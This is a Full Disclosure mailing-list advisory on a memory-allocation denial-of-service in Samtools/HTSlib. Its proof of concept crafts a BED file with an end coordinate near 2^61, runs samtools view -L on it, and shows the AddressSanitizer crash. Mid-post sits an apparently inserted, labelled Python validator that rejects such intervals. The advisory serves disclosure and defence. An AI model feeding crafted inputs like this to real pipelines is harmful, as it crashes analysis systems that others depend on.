Message-ID: <CAFmK-GxzemFKLUGytEfQqUzts43yMkj_d2KO8D+hguqEW5puAg@mail.gmail.com>
Date: Sun, 28 Sep 2025 12:17:19 -0400
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
A denial-of-service vulnerability exists in Samtools and the underlying
HTSlib when processing BED files containing extremely large interval
values. The bed_index_core() function in bedidx.c uses the interval end
coordinate to calculate allocation size without sufficient validation. By
supplying a BED record with a crafted end coordinate (e.g., near 2^61), an
attacker can trigger uncontrolled memory allocation requests via
hts_resize_array_(). This leads to process termination due to failed
allocations, effectively causing a denial of service. This issue can be
exploited by tricking a user or automated pipeline into loading a malicious
BED file with oversized intervals (e.g., via the -L option of samtools
view).
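As an added example (not part of this advisory or of the samtools/htslib code), a Python pre-flight check that a pipeline can run over a BED file before handing it to samtools view -L: it rejects records whose end coordinate exceeds a sane bound (an assumed default of 2^31-1, or the contig's real length when a mapping such as one built from a .fai index is supplied), as well as inverted, negative or malformed intervals. The constant, function names and sample records are assumptions for illustration.

```python
"""Pre-flight check for BED files before they reach samtools -L / htslib."""

# Assumed bound for this example: no real chromosome approaches 2^31 bases,
# so an end coordinate beyond that cannot describe sequence; it only inflates
# the per-contig array that bed_index_core() sizes from the largest end.
MAX_COORD = 2**31 - 1


def check_bed_line(line, lineno, max_coord=MAX_COORD, contig_lengths=None):
    """Return None if the record is sane, otherwise a message naming the defect.

    contig_lengths (optional) maps contig name -> length; when given, each
    end coordinate is bounded by its own contig instead of max_coord.
    """
    stripped = line.strip()
    if not stripped or stripped[0] == "#":
        return None  # blank and comment lines carry no interval
    fields = stripped.split(None, 3)  # only chrom, start, end matter here
    if fields[0] in ("track", "browser"):
        return None  # UCSC header lines, not intervals
    if len(fields) < 3:
        return f"line {lineno}: fewer than 3 fields"
    chrom, start_s, end_s = fields[0], fields[1], fields[2]
    try:
        start, end = int(start_s), int(end_s)
    except ValueError:
        return f"line {lineno}: non-integer coordinate {start_s!r} / {end_s!r}"
    if start < 0:
        return f"line {lineno}: negative start {start}"
    if end <= start:
        return f"line {lineno}: end {end} not greater than start {start}"
    bound = max_coord
    if contig_lengths is not None:
        if chrom not in contig_lengths:
            return f"line {lineno}: unknown contig {chrom!r}"
        bound = contig_lengths[chrom]
    if end > bound:
        return f"line {lineno}: end {end} exceeds limit {bound} for {chrom}"
    return None


def validate_bed(text, max_coord=MAX_COORD, contig_lengths=None):
    """Check every record; an empty list means the file is safe to pass on."""
    problems = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        problem = check_bed_line(line, lineno, max_coord, contig_lengths)
        if problem:
            problems.append(problem)
    return problems


# Constructed sample: a sane record, the advisory's oversized record, and an
# inverted interval.
SAMPLE_BED = "chr1\t0\t1000\nchr1\t0\t2305843009213693940\nchr2\t500\t400\n"
```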
*Impact*
- Denial-of-Service (DoS)
*Proof of Concept:*
# Craft BED with an oversized interval
echo -e "chr1\t0\t2305843009213693940" > bad.bed
# Trigger DoS with samtools
samtools view -L bad.bed big.bam
*Output:*
=================================================================
==1060879==ERROR: AddressSanitizer: requested allocation size 0x10000000000000 (0x10000000001000 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
#0 0xaad05674fd5c in realloc (/root/samtools/samtools+0xdfd5c) (BuildId: 031fb204568f835410c0dd07ee99a915c9a7b660)
#1 0xaad0568afc64 in hts_resize_array_ /root/htslib/hts.c:5070:15
#2 0xaad056873d80 in bed_index_core /root/samtools/bedidx.c:120:13
#3 0xaad056873d80 in bed_index /root/samtools/bedidx.c:149:17
#4 0xaad056872780 in bed_read /root/samtools/bedidx.c:348:9
#5 0xaad0567958b4 in main_samview /root/samtools/sam_view.c:1066:33
#6 0xaad0567d5b40 in main /root/samtools/bamtk.c:246:55
#7 0xfffaacef2290 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#8 0xfffaacef2374 in __libc_start_main csu/../csu/libc-start.c:360:3
#9 0xaad0566acc6c in _start (/root/samtools/samtools+0x3cc6c) (BuildId: 031fb204568f835410c0dd07ee99a915c9a7b660)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/